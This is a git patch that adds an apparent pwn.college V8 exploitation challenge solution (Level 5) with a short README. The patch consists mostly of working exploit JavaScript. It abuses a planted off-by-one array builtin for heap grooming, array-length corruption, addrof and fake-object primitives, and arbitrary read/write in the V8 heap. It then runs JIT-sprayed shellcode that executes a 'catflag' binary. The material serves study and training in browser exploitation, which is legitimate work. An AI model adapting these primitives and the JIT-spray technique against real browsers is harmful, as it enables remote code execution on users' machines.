From cf1552b5228bfa457e259906bb0dc4e3ac618a45 Mon Sep 17 00:00:00 2001
From: Jack Ren <admin@renjikai.com>
Date: Sat, 14 Sep 2024 21:20:16 +0800
Subject: [PATCH] Level 5 of PwnCollegeV8Exploitation

---
 .../Level5/Exploit.js                         | 158 ++++++++++++++++++
 .../PwnCollegeV8Exploitation/Level5/README.md |  14 ++
 2 files changed, 172 insertions(+)
 create mode 100644 JavaScript/PwnCollegeV8Exploitation/Level5/Exploit.js
 create mode 100644 JavaScript/PwnCollegeV8Exploitation/Level5/README.md

diff --git a/JavaScript/PwnCollegeV8Exploitation/Level5/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level5/Exploit.js
new file mode 100644
index 0000000..dc21477
--- /dev/null
+++ b/JavaScript/PwnCollegeV8Exploitation/Level5/Exploit.js
@@ -0,0 +1,158 @@
+// Integrated Builtin:
+// - Array.prototype.offByOne(...)
+//   - Read (void)
+//   - Write (double value)
+
+let ab = new ArrayBuffer(8);
+let f64a = new Float64Array(ab, 0, 1);
+let i32a = new Uint32Array(ab, 0, 2);
+let si32a = new Int32Array(ab, 0, 2);
+let bi64a = new BigUint64Array(ab, 0, 1);
+
+function c2f(low, high) { // combined (two 4 bytes) word to float
+    i32a[0] = low;
+    i32a[1] = high;
+    return f64a[0];
+}
+
+function b2f(v) { // bigint to float
+    bi64a[0] = v;
+    return f64a[0];
+}
+
+function f2b(v) { // float to bigint
+    f64a[0] = v;
+    return bi64a[0];
+}
+
+function unptr(v) {
+    return v & 0xfffffffe;
+}
+
+function ptr(v) {
+    return v | 1;
+}
+
+function shellcode() { // Promote to ensure not GC during training
+    // JIT spray machine code form of `execve("catflag", NULL, NULL)`
+    return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
+}
+for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation, too large loop count will trigger TURBOFAN
+
+let offByOneArr = [1.1];
+let corrupted_obj = {inline: 1};
+corrupted_obj.outofline1 = 2;
+corrupted_obj.outofline2 = 3;
+
+let corrupted_obj_map_properties = offByOneArr.offByOne();
+f64a[0] = corrupted_obj_map_properties;
+let corrupted_obj_properties_addr = i32a[1];
+console.log("addrof(corrupted_obj.properties) = ", corrupted_obj_properties_addr.toString(16));
+
+let offByOneArr_addr = corrupted_obj_properties_addr - 0x7c;
+console.log("addrof(offByOneArr) = ", offByOneArr_addr.toString(16));
+
+i32a[1] = offByOneArr_addr;
+offByOneArr.offByOne(f64a[0]); // Replace corrupted_obj.properties with offByOneArr
+
+corrupted_obj.outofline2 = 0x1000_0000; // offByOneArr.length
+
+if (offByOneArr.length !== 0x1000_0000) {
+    throw new Error("offByOneArr.length corrupt failed!");
+}
+
+// %DebugPrint(offByOneArr);
+// %DebugPrint(corrupted_obj);
+// %SystemBreak();
+
+let placeholder = {};
+let corrupt_arr = [2.30234590962020889586281057477E-320];
+let double_arr = [1.09366371363418335018925267989E-319];
+let obj_arr = [placeholder];
+
+f64a[0] = offByOneArr[0x150 / 8];
+i32a[0] = 0x1000 << 1; // corrupt_arr.length
+offByOneArr[0x150 / 8] = f64a[0];
+
+if (corrupt_arr.length !== 0x1000) {
+    throw new Error("corrupt_arr.length corrupt failed!");
+}
+
+// %DebugPrint(corrupt_arr);
+// %DebugPrint(double_arr);
+// %DebugPrint(obj_arr);
+// %SystemBreak();
+
+const corrupt_arr_0_to_obj_arr_0_offset = 13;
+const corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD = 1;
+
+function GetAddressOf(obj) {
+    obj_arr[0] = obj;
+    f64a[0] = corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset];
+    return unptr(i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD]);
+}
+
+function GetFakeObject(addr) {
+    f64a[0] = corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset];
+    let old_obj_addr = i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD];
+    i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD] = ptr(addr);
+    corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset] = f64a[0];
+    let faked_obj = obj_arr[0];
+    i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD] = old_obj_addr;
+    corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset] = f64a[0];
+    return faked_obj;
+}
+
+const corrupt_arr_0_to_double_arr_element_offset = 4;
+
+// QWORD Aligned
+function ArbRead64(cage_addr) { // int32
+    if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");
+    corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
+    let result = f2b(double_arr[0]);
+    console.log(`ArbRead64 ${cage_addr.toString(16)}: ${result.toString(16)}`);
+    return result;
+}
+
+// QWORD Aligned
+function ArbWrite64(cage_addr, value) { // int32, bigint
+    if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");
+    corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
+    let written = b2f(value);
+    double_arr[0] = written;
+    console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
+}
+
+// DWORD Aligned
+function ArbRead32(cage_addr) { // int32 -> int32
+    if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
+    bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
+    let result = i32a[(cage_addr & 0x4) >> 2];
+    console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
+    return result;
+}
+
+// DWORD Aligned
+function ArbWrite32(cage_addr, value) { // int32, int32 -> void
+    if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
+    let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
+    bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
+    i32a[(cage_addr & 0x4) >> 2] = value;
+    ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
+    console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
+}
+
+let shellcode_addr = GetAddressOf(shellcode);
+console.log("Address of shellcode: " + shellcode_addr.toString(16));
+// %DebugPrint(shellcode);
+// %SystemBreak();
+let code_addr = unptr(ArbRead32(shellcode_addr + 0xC));
+console.log("Address of code: " + code_addr.toString(16));
+// %DebugPrintPtr(code_addr + 0x1);
+// %SystemBreak();
+let instruction_start_addr = code_addr + 0x14;
+let instruction_start = ArbRead32(instruction_start_addr);
+console.log("instruction_start: " + instruction_start.toString(16));
+ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
+
+shellcode();
\ No newline at end of file
diff --git a/JavaScript/PwnCollegeV8Exploitation/Level5/README.md b/JavaScript/PwnCollegeV8Exploitation/Level5/README.md
new file mode 100644
index 0000000..2d55f2d
--- /dev/null
+++ b/JavaScript/PwnCollegeV8Exploitation/Level5/README.md
@@ -0,0 +1,14 @@
+# Level 5
+
+## Problem
+
+Given a vulnerability which can OffByOne Read/Write an double array.
+
+## Key Knowledge
+
+- Heap Fengshui
+- Some inspiration to corrupt array's length
+    - This is an open-ended question, so use your imagination!
+
+`Exploit.js` is only one of the possible answers. Don't be bound by it.
+Find out some brand-new ways using your own mind!